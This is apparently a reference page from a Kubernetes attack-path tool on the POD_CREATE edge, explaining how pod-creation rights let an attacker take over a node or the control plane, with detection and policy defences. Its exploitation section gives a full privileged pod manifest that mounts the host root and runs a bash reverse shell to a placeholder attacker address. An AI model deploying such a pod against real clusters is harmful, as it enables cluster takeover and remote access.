POD_CREATE
Create a pod with significant privilege (CAP_SYSADMIN, hostPath=/, etc) and schedule on a target node via setting the nodeName selector.
| Source | Destination | MITRE |
|---|---|---|
| PermissionSet | Node | Container Orchestration Job, T1053.007 |
Details
Given the rights to create a new pod, an attacker can create a deliberately overprivileged pod within the cluster. This will grant the attacker full control over the node on which the pod is scheduled (via any number of container escape techniques). Additionally by setting the nodeName selector in the pod spec to the control plane node, the attacker can gain root access to the control plane node and take over the entire cluster!
Prerequisites
A role granting permission to create pods.
Checks
Check whether the current account has the ability to create pods, for example using kubectl:
Exploitation
Identify the name of the target (e.g control plane) node via:
Create a pod spec for our attack pod (N.B. If your target node is a control plane one you may need to add a toleration to this manifest to allow it to be scheduled):
apiVersion: v1
kind: Pod
metadata:
name: control-plane-attack
labels:
app: pentest
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: control-plane-attack
image: ubuntu
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" ]
nodeName: < TARGET NODE NAME >
volumes:
- name: noderoot
hostPath:
path: /
Create the pod via kubectl:
Defences
Monitoring
- Monitor for pod creation from within an existing pod
- Monitor privileged pod creation with suspicious command arguments
Implement security policies
Use a pod security policy or admission controller to prevent or limit the creation of pods with additional powerful capabilities.